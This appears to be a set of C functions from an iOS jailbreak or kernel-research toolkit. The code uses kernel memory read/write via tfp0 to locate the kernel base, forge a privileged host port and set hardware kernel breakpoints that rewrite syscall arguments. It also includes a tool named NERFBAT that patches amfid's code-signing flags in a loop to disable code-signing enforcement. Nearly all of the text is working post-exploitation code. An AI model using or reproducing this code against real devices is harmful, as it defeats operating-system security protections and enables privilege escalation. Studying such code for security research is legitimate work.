uint64_t find_kernel_base() { uint64_t hostport_addr = find_port(mach_host_self()); uint64_t realhost = rk64(hostport_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); uint64_t base = realhost & ~0xfffULL; // walk down to find the magic: for (int i = 0; i < 0x10000; i++) { if (rk32(base) == 0xfeedfacf) { return base; } base -= 0x1000; } return 0; }
void sys_write_breakpoint_handler(arm_context_t* state) { // we will have to skip it one instruction ahead because single step won't work... state->ss.ss_64.pc += 4; // this means emulating what that instruction did: // LDR X8, [X8,#0x388] uint64_t val = rk64(state->ss.ss_64.x[8] + 0x388); state->ss.ss_64.x[8] = val; uint64_t uap = state->ss.ss_64.x[1]; char* replacer_string = strdup("a different string!\n"); wk64(uap+8, (uint64_t)replacer_string); wk64(uap+0x10, strlen(replacer_string)); }
// build a fake host priv port mach_port_t fake_host_priv() { if (fake_host_priv_port != MACH_PORT_NULL) { return fake_host_priv_port; } // get the address of realhost: uint64_t hostport_addr = find_port(mach_host_self()); uint64_t realhost = rk64(hostport_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); // allocate a port mach_port_t port = MACH_PORT_NULL; kern_return_t err; err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); if (err != KERN_SUCCESS) { printf("failed to allocate port\n"); return MACH_PORT_NULL; } // get a send right mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); // locate the port uint64_t port_addr = find_port(port); // change the type of the port #define IKOT_HOST_PRIV 4 #define IO_ACTIVE 0x80000000 wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_HOST_PRIV); // change the space of the port wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), ipc_space_kernel()); // set the kobject wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), realhost); fake_host_priv_port = port; return port; }
int main(int argc, char** argv) { if (argc != 2) { printf("Usage\n\t%s kernel_base\n", argv[0]); return -1; } uint64_t kernel_base = strtoull(argv[1], NULL, 0x10); // THIS IS BOILERPLATE TO PROPERLY GAIN TFP0 AND INITIALIZE INTERNALS offsets_init(); task_t kernel_task; host_get_special_port(mach_host_self(), HOST_LOCAL_NODE, 4, &kernel_task); task_self_addr(); kernel_task_port = kernel_task; tfp0 = kernel_task; // THIS IS BOILERPLATE TO PROPERLY GAIN TFP0 AND INITIALIZE INTERNALS printf("Using kernel base 0x%llx\n", kernel_base); printf("Kernel base * == 0x%llx\n", rk64(kernel_base)); init_ws(kernel_task, kernel_base); wsmain(0); }
int main(int argc, char** argv) { // THIS IS BOILERPLATE TO PROPERLY GAIN TFP0 AND INITIALIZE INTERNALS offsets_init(); task_t kernel_task; host_get_special_port(mach_host_self(), HOST_LOCAL_NODE, 4, &kernel_task); task_self_addr(); kernel_task_port = kernel_task; tfp0 = kernel_task; // THIS IS BOILERPLATE TO PROPERLY GAIN TFP0 AND INITIALIZE INTERNALS if (argc != 1) { printf("Usage\n\t%s NO ARGUMENTS\n", argv[0]); return -1; } fprintf(stderr, "[NERFBAT]\tVersion 0.3b (tfp = 0x%x)\n", tfp0); fprintf(stderr, "[NERFBAT]\tpid = %d\n", getpid()); fprintf(stderr, "[NERFBAT]\tWaiting on handle for MISVSACI to open up...\n"); sleep(5); set_platform_attribs(get_proc_block(getpid()), tfp0); uint32_t amfid_pid = 0; kern_return_t kr; mach_port_name_t amfid_port = 0; int failure = 1; uint64_t old_amfid_MISVSACI_local = 0; if(!(access("/tmp/amfid.MISVSACI", F_OK) == -1)) { char fdata[0x20]; sprintf(fdata, "0x%llx", old_amfid_MISVSACI); int fd = open("/tmp/amfid.MISVSACI", O_RDONLY); read(fd, fdata, 0x20); close(fd); old_amfid_MISVSACI_local = strtoull(fdata, 0, 0x10); old_amfid_MISVSACI = old_amfid_MISVSACI_local; fprintf(stderr, "[NERFBAT]\tLoading old jump table: 0x%llx\n", old_amfid_MISVSACI); fprintf(stderr, "[NERFBAT]\tabout to search for the binary load address\n"); amfid_pid = get_pid_from_name("amfid"); fprintf(stderr, "[NERFBAT]\tAMFID pid = %d\n", amfid_pid); fprintf(stderr, "[NERFBAT]\t[i]\ttask for pid 0 = 0x%x\n", tfp0); kr = task_for_pid(mach_task_self(), amfid_pid, &amfid_port); if (kr != KERN_SUCCESS) fprintf(stderr, "[NERFBAT]\t[-]\tTHERE WAS AN ERROR GETTING task_for_portfor AMFID\n"); amfid_base = binary_load_address(amfid_port); fprintf(stderr, "[NERFBAT]\tamfid load address: 0x%llx\n", amfid_base); } else { fprintf(stderr, "[NERFBAT]\t[i]\tMASSIVE PROBLEM IN NERFBAT\n"); } while (1) { if (failure || get_pid_from_name("amfid") != amfid_pid) { amfid_pid = get_pid_from_name("amfid"); fprintf(stderr, "[NERFBAT]\t[i]\tAMFID pid == %d\n", amfid_pid); uint64_t amfid_proc = get_proc_block(amfid_pid); amfid_base = amfid_proc; fprintf(stderr, "[NERFBAT]\t[i]\tAMFID proc bloc == 0x%llx\n", amfid_proc); //We need to enable amfid to allow us to get a port to it fprintf(stderr, "[NERFBAT]\t[i]\tAMFID pid == %d\n", amfid_pid); uint64_t amfid_task = get_proc_block(amfid_pid); fprintf(stderr, "[NERFBAT]\t[i]\tGot amfid pid at 0x%llx\n", amfid_task); uint64_t vnode_info = rk64(amfid_task+0x248); fprintf(stderr, "[NERFBAT]\t[i]\tVNODE INFO : 0x%llx\n", vnode_info); uint64_t ubc_info = rk64(vnode_info+0xf*sizeof(uint64_t)); fprintf(stderr, "[NERFBAT]\t[i]\tMy UBC INFO is 0x%llx\n", ubc_info); uint64_t blob = rk64(ubc_info+0xa*sizeof(uint64_t)); char *csb = malloc(0xa8); mach_vm_address_t sz = 0; mach_vm_read_overwrite(tfp0, (mach_vm_address_t)blob, 0xa8, (mach_vm_address_t)csb, &sz); fprintf(stderr, "[NERFBAT]\t[i]\tCurrent 0xa4 = 0x%02x\n", (int)*(char *)((char *)csb + 0xA4)); *(char *)((char *)csb + 0xA4) = (*((char *)csb + 0xA4) & 0xFE) | 1; fprintf(stderr, "[NERFBAT]\t[i]\tNew 0xa4 = 0x%02x\n", (int)*(char *)((char *)csb + 0xA4)); fprintf(stderr, "[NERFBAT]\t[i]\tCurrent 0xc = 0x%04x\n", *(uint32_t *)((uint32_t *)csb + 0xc)); *(uint32_t *)((uint32_t *)csb + 0xc) = *((uint32_t *)csb + 0xc) | htonl(0x22000005); fprintf(stderr, "[NERFBAT]\t[i]\tCurrent 0xc = 0x%04x\n", *(uint32_t *)((uint32_t *)csb + 0xc)); mach_vm_write(tfp0, blob, (vm_offset_t)csb, 0xa8); free(csb); fprintf(stderr, "[NERFBAT]\t[i]\ttask for pid 0 = 0x%x\n", tfp0); kr = task_for_pid(mach_task_self(), amfid_pid, &amfid_port); if (kr != KERN_SUCCESS) { fprintf(stderr, "[NERFBAT]\t[-]\tTHERE WAS AN ERROR GETTING task_for_portfor AMFID\n"); failure = 1; } else { failure = 0; } fprintf(stderr, "[NERFBAT]\t[i]\tPATCHING AMFID on port = 0x%x\n", amfid_port); unpatch_amfid(amfid_port, old_amfid_MISVSACI_local); patch_amfid(amfid_port); } fprintf(stderr, "[NERFBAT]\t[i]\tSleeping for 10 seconds...\n"); sleep(10); } }
// this runs on the thread which will execute the target syscall to debug void run_syscall_with_breakpoint(uint64_t bp_address, breakpoint_callback callback, uint32_t syscall_number, uint32_t n_args, ...) { // pin this thread to the target cpu: pin_current_thread(); // set the Kernel Debug Enable bit of MDSCR_EL1: set_MDSCR_EL1_KDE(mach_thread_self()); // MDE will be set by the regular API for us // enable a hw debug breakpoint at bp_address // it won't fire because PSTATE.D will be set, but we'll deal with that in a bit! // set a hardware bp on the thread using the proper API so that all the structures are already set up: struct arm64_debug_state state = {0}; state.bvr[0] = bp_address; #define BCR_BAS_ALL (0xf << 5) #define BCR_E (1 << 0) state.bcr[0] = BCR_BAS_ALL | BCR_E; // enabled kern_return_t err = thread_set_state(mach_thread_self(), ARM_DEBUG_STATE64, (thread_state_t)&state, sizeof(state)/4); // verify that it got set: memset(&state, 0, sizeof(state)); mach_msg_type_number_t count = sizeof(state)/4; err = thread_get_state(mach_thread_self(), ARM_DEBUG_STATE64, (thread_state_t)&state, &count); if (state.bvr[0] != bp_address) { printf("setting the bp address failed\n"); } // now go and find that thread's DebugData where those values are stored. uint64_t thread_port_addr = find_port_address(mach_thread_self(), MACH_MSG_TYPE_COPY_SEND); uint64_t thread_t_addr = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); printf("thread_t_addr: %llx\n", thread_t_addr); // read bvr[0] in that thread_t's DebugData: uint64_t DebugData = rk64(thread_t_addr + ACT_DEBUGDATA_OFFSET); //printf("DebugData: %llx\n", DebugData); uint64_t bvr0 = rk64(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bvr[0])); printf("bvr0 read from the DebugData: 0x%llx\n", bvr0); uint32_t bcr0 = rk32(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bcr[0])); printf("bcr0 read from the DebugData: 0x%08x\n", bcr0); // need to manually set this too in the bcr: #define ARM_DBG_CR_MODE_CONTROL_ANY (3 << 1) bcr0 |= ARM_DBG_CR_MODE_CONTROL_ANY; wk32(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bcr[0]), bcr0); printf("set ARM_DBG_CR_MODE_CONTROL_ANY\n"); // returning from the syscall should be enough to set it. struct monitor_args* margs = malloc(sizeof(struct monitor_args)); margs->target_thread_port = mach_thread_self(); margs->breakpoint = bp_address; margs->callback = callback; // spin up a thread to monitor when the bp is hit: pthread_t th; pthread_create(&th, NULL, monitor_thread, (void*)margs); printf("started monitor thread\n"); struct syscall_args sargs = {0}; sargs.number = syscall_number; va_list ap; va_start(ap, n_args); for (int i = 0; i < n_args; i++){ sargs.arg[i] = va_arg(ap, uint64_t); } va_end(ap); // now execute a syscall with PSTATE.D disabled: syscall_complete = 0; do_syscall_with_pstate_d_unmasked(&sargs); syscall_complete = 1; printf("syscall returned\n"); pthread_join(th, NULL); printf("monitor exited\n"); }
void handle_kernel_bp_hits(mach_port_t target_thread_port, uint64_t looper_pc, uint64_t breakpoint, breakpoint_callback callback) { // get the target thread's thread_t uint64_t thread_port_addr = find_port_address(target_thread_port, MACH_MSG_TYPE_COPY_SEND); uint64_t thread_t_addr = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); while (1) { uint64_t looper_saved_state = 0; int found_it = 0; while (!found_it) { if (syscall_complete) { return; } // we've pinned ourself to the same core, so if we're running, it isn't... // in some ways this code is very racy, but when we actually have detected that the target // thread has hit the breakpoint it should be safe until we restart it // and up until then we don't do anything too dangerous... // get the kstack pointer uint64_t kstackptr = rk64(thread_t_addr + koffset(KSTRUCT_OFFSET_THREAD_KSTACKPTR)); printf("kstackptr: %llx\n", kstackptr); // get the thread_kernel_state // the stack lives below kstackptr, and kstackptr itself points to a struct thread_kernel_state: // the first bit of that is just an arm_context_t: // this is the scheduled-off state arm_context_t saved_ksched_state = {0}; kmemcpy((uint64_t)&saved_ksched_state, kstackptr, sizeof(arm_context_t)); // get the saved stack pointer uint64_t sp = saved_ksched_state.ss.ss_64.sp; printf("sp: %llx\n", sp); if (sp == 0) { continue; } uint64_t stack[128] = {0}; // walk up from there and look for the saved state dumped by the fiq: // note that it won't be right at the bottom of the stack // instead there are the frames for: // ast_taken_kernel <-- above this is the saved state which will get restored when the hw bp spinner gets rescheduled // thread_block_reason // thread_invoke // machine_switch_context // Switch_context <-- the frame actually at the bottom of the stack // should probably walk those stack frame properly, but this will do... // grab the stack kmemcpy((uint64_t)&stack[0], sp, sizeof(stack)); //for (int i = 0; i < 128; i++) { // printf("%016llx\n", stack[i]); //} for (int i = 0; i < 128; i++) { uint64_t flavor_and_count = stack[i]; if (flavor_and_count != (ARM_SAVED_STATE64 | (((uint64_t)ARM_SAVED_STATE64_COUNT) << 32))) { continue; } arm_context_t* saved_state = (arm_context_t*)&stack[i]; if (saved_state->ss.ss_64.pc != looper_pc) { continue; } found_it = 1; looper_saved_state = sp + (i*sizeof(uint64_t)); printf("found the saved state probably at %llx\n", looper_saved_state); // should walk the stack properly.. break; } if (!found_it) { printf("unable to find the saved scheduler tick state on the stack, waiting a bit then trying again...\n"); sleep(1); return; } } // now keep walking up and find the saved state for the code which hit the BP: uint64_t bp_hitting_state = looper_saved_state + sizeof(arm_context_t); found_it = 0; for (int i = 0; i < 1000; i++) { uint64_t flavor_and_count = rk64(bp_hitting_state); if (flavor_and_count != (ARM_SAVED_STATE64 | (((uint64_t)ARM_SAVED_STATE64_COUNT) << 32))) { bp_hitting_state += 8; continue; } arm_context_t bp_context; kmemcpy((uint64_t)&bp_context, bp_hitting_state, sizeof(arm_context_t)); for (int i = 0; i < 40; i++) { uint64_t* buf = (uint64_t*)&bp_context; printf("%016llx\n", buf[i]); } if (bp_context.ss.ss_64.pc != breakpoint) { printf("hummm, found an unexpected breakpoint: %llx\n", bp_context.ss.ss_64.pc); } found_it = 1; break; } if (!found_it) { printf("unable to find bp hitting state\n"); } // fix up the bp hitting state so it will continue (with whatever modifications we want:) // get a copy of the state: arm_context_t bp_context; kmemcpy((uint64_t)&bp_context, bp_hitting_state, sizeof(arm_context_t)); callback(&bp_context); // write that new state back: kmemcpy(bp_hitting_state, (uint64_t)&bp_context, sizeof(arm_context_t)); // unblock the looper: wk64(looper_saved_state + offsetof(arm_context_t, ss.ss_64.pc), ksym(KSYMBOL_SLEH_SYNC_EPILOG)); // when it runs again it should break out of the loop and continue the syscall // forces us off the core and hopefully it on: thread_switch(target_thread_port, 0, 0); swtch_pri(0); } }
// pin the current thread to a processor, returns a pointer to the processor we're pinned to uint64_t pin_current_thread() { // get the current thread_t: uint64_t th = current_thread(); #if 0 // get the processor_t this thread last ran on uint64_t processor = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_LAST_PROCESSOR)); printf("thread %llx last ran on %llx, pinning it to that core\n", th, processor); // this is probably fine... wk64(th + koffset(KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR), processor); #endif // need the struct cpu_data for that processor which is stored in the CpuDataEntries array, declared in data.s // it's 6*4k in to the data segment uint64_t cpu_data_entries = ksym(KSYMBOL_CPU_DATA_ENTRIES); int cpu_id = 0; // it's an array of cpu_data_entry_t which contains just the 64-bit physical and virtual addresses of struct cpu_data uint64_t cpu_data = rk64(cpu_data_entries + ((cpu_id * 0x10) + 8)); uint64_t processor = rk64(cpu_data + koffset(KSTRUCT_OFFSET_CPU_DATA_CPU_PROCESSOR)); printf("trying to pin to cpu0: %llx\n", processor); // pin to that cpu // this is probably fine... wk64(th + koffset(KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR), processor); // that binding will only take account once we get scheduled off and back on again so yield the cpu: printf("pin_current_thread yielding cpu\n"); swtch_pri(0); printf("pin_current_thread back on cpu\n"); uint64_t chosen = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); printf("running on %llx\n", chosen); #if 0 // should now be running on the chosen processor, and should only get scheduled on there: printf("we're running again!\n"); int got_switched = 0; for (int i = 0; i < 1000; i++) { swtch_pri(0); uint64_t p = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); if (p != processor) { printf("got moved off target processor\n"); got_switched = 1; break; } usleep(15000); p = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); if (p != processor) { printf("got moved off target processor\n"); got_switched = 1; break; } } if (!got_switched) { printf("looks like pinning works!\n"); } #endif return processor; }
uint64_t current_thread() { uint64_t thread_port = find_port(mach_thread_self()); return rk64(thread_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); }
uint64_t ipc_space_kernel() { return rk64(task_self_addr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)); }